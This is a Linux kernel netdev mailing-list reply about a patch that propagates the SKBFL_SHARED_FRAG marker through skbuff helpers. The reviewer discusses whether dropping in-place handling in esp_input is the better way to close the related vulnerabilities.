> Agreed. Tracing SKBFL_SHARED_FRAG propagation paths one by one is
> not a robust direction for the fix. Even minor logic changes elsewhere
> could cause the issue to resurface.
>
> As a follow-up, eliminating the in-place handling in esp_input -- accepting

It would close this group of vulnerabilities, but there are other
parts of the networking stack that consume this flag. For those,
chasing missing flag propagation is still a useful task.

> the performance trade-off -- seems necessary. That was actually the
> direction of my initial proposal:
>
> https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/

But you chose to abandon this approach (I guess because of the AI
feedback Simon forwarded? Feedback doesn't necessarily mean "drop this
entirely").

-- 
Sabrina


end of thread, other threads:[~2026-05-14 10:21 UTC | newest]

Thread overview: 6+ messages
2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim
2026-05-14  6:18 ` Sultan Alsawaf
2026-05-14  9:23   ` Hyunwoo Kim
2026-05-14  8:04 ` Paolo Abeni
2026-05-14  9:38   ` Hyunwoo Kim
2026-05-14 10:21     ` Sabrina Dubroca
